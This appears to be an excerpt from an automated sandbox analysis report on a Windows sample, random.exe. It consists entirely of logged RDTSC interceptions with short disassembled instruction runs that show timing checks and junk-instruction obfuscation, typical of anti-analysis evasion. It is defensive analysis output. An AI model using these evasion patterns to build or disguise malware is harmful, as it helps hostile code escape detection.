      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 10446D0 second address: 10446D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107D836 second address: 107D83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107D83F second address: 107D849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA8D8E164A6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107D849 second address: 107D84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107D84D second address: 107D85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FA8D8E164A6h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107D85E second address: 107D89F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA8D8E1DD15h 0x0000000c jmp 00007FA8D8E1DD09h 0x00000011 jno 00007FA8D8E1DCF6h 0x00000017 jno 00007FA8D8E1DCFCh 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007FA8D8E1DCF6h 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107D9DD second address: 107D9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107DE20 second address: 107DE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFDh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107DE31 second address: 107DE3E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107E13A second address: 107E145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107E145 second address: 107E14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 10761CD second address: 10761FC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA8D8E1DD02h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E1DD04h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 10761FC second address: 1076219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1076219 second address: 1076235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1076235 second address: 1076239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1076239 second address: 1076243 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA8D8E1DCF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1047CC7 second address: 1047CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1047CCD second address: 1047CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FA8D8E1DD08h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 107F2D9 second address: 107F307 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA8D8E164B6h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA8D8E164AAh 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1081668 second address: 108166C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108166C second address: 1081675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 104621B second address: 104622D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA8D8E1DCF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 104622D second address: 1046235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1046235 second address: 104623B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 104623B second address: 1046241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1046241 second address: 1046247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1046247 second address: 1046252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1046252 second address: 1046256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1086B6E second address: 1086B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 10872BA second address: 108731B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FA8D8E1DCF6h 0x00000015 popad 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c jng 00007FA8D8E1DCFCh 0x00000022 jg 00007FA8D8E1DCF6h 0x00000028 jmp 00007FA8D8E1DD05h 0x0000002d popad 0x0000002e mov eax, dword ptr [eax] 0x00000030 pushad 0x00000031 jmp 00007FA8D8E1DD01h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108731B second address: 108731F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108731F second address: 1087323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 10874BF second address: 10874C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108ACD2 second address: 108ACD8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108C7D8 second address: 108C7DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108C8D7 second address: 108C8EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD01h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108CFD5 second address: 108CFD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108CFD9 second address: 108D01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FA8D8E1DCF6h 0x0000000d jmp 00007FA8D8E1DD06h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push esi 0x00000016 jmp 00007FA8D8E1DD06h 0x0000001b pop esi 0x0000001c xchg eax, ebx 0x0000001d cmc 0x0000001e push eax 0x0000001f push esi 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108D1F7 second address: 108D21C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA8D8E164ADh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA8D8E164ADh 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108D399 second address: 108D39F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108D39F second address: 108D3BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FA8D8E164A8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108D647 second address: 108D64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108D64D second address: 108D652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108DAC2 second address: 108DB3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA8D8E1DD0Fh 0x00000008 jmp 00007FA8D8E1DD09h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 jmp 00007FA8D8E1DD07h 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D37C9h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FA8D8E1DCF8h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FA8D8E1DD01h 0x00000041 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108E2B0 second address: 108E2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108EC4B second address: 108EC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108F611 second address: 108F615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 108F615 second address: 108F661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FA8D8E1DCF8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 sbb edi, 79C3FE84h 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D2911h], ebx 0x00000031 push 00000000h 0x00000033 sub dword ptr [ebp+122D1DDBh], edi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1090120 second address: 1090124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1090124 second address: 1090172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FA8D8E1DCF8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov di, 725Ah 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c jmp 00007FA8D8E1DCFAh 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jng 00007FA8D8E1DCF6h 0x0000003b jg 00007FA8D8E1DCF6h 0x00000041 popad 0x00000042 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1090172 second address: 109017C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA8D8E164ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 109017C second address: 1090188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1091465 second address: 1091483 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA8D8E164A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007FA8D8E164A8h 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 je 00007FA8D8E164A6h 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 109222F second address: 109224D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 109224D second address: 1092251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1092251 second address: 1092257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 1092257 second address: 109225C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exe | RDTSC instruction interceptor: First address: 109225C second address: 1092262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1092262 second address: 10922EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FA8D8E164A8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sbb esi, 58C6C5D6h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FA8D8E164A8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov esi, ecx 0x00000046 sub dword ptr [ebp+1245E0E9h], edx 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push ecx 0x00000051 call 00007FA8D8E164A8h 0x00000056 pop ecx 0x00000057 mov dword ptr [esp+04h], ecx 0x0000005b add dword ptr [esp+04h], 0000001Dh 0x00000063 inc ecx 0x00000064 push ecx 0x00000065 ret 0x00000066 pop ecx 0x00000067 ret 0x00000068 xchg eax, ebx 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FA8D8E164B0h 0x00000070 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10922EF second address: 109230A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD07h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10973F8 second address: 10973FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1098318 second address: 1098336 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E1DD02h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1098336 second address: 109835C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA8D8E164AAh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109835C second address: 1098362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1098362 second address: 1098366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10975B9 second address: 10975CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFEh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10976C8 second address: 10976CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1099634 second address: 109963E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109B2E1 second address: 109B312 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA8D8E164B5h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c je 00007FA8D8E164BFh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA8D8E164ADh 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109B57A second address: 109B57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109B57F second address: 109B585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109D60D second address: 109D628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jmp 00007FA8D8E1DD01h 0x0000000e pop ecx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E462 second address: 109E46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA8D8E164A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E46D second address: 109E47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jc 00007FA8D8E1DCFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E47E second address: 109E4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B7h 0x00000009 popad 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2014h] 0x00000011 add edi, dword ptr [ebp+122D37D9h] 0x00000017 push 00000000h 0x00000019 clc 0x0000001a push 00000000h 0x0000001c xchg eax, esi 0x0000001d jmp 00007FA8D8E164B0h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jnc 00007FA8D8E164A6h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E4C9 second address: 109E4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E4CE second address: 109E4E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA8D8E164B0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F3DA second address: 109F468 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FA8D8E1DCF8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+1244C3D1h] 0x0000002b push 00000000h 0x0000002d or dword ptr [ebp+122D2891h], edi 0x00000033 jmp 00007FA8D8E1DD06h 0x00000038 push 00000000h 0x0000003a je 00007FA8D8E1DCF9h 0x00000040 mov bx, cx 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push edx 0x00000046 jmp 00007FA8D8E1DD05h 0x0000004b pop edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FA8D8E1DD06h 0x00000053 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F468 second address: 109F476 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F476 second address: 109F47C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109F47C second address: 109F486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA8D8E164A6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E66B second address: 109E68D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E68D second address: 109E691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109E691 second address: 109E697 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
